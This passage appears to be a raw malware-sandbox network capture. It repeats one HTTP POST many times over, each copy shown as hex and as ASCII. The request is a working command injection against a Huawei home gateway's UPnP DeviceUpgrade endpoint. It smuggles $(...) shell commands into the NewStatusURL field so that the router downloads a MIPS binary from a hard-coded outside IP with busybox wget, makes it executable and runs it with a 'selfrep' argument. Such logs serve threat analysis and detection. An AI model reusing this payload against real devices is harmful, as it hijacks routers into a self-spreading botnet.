6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 39 2e 31 39 34 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 74 61 6a 6d 61 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 15.235.209.194 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                  Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 492Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 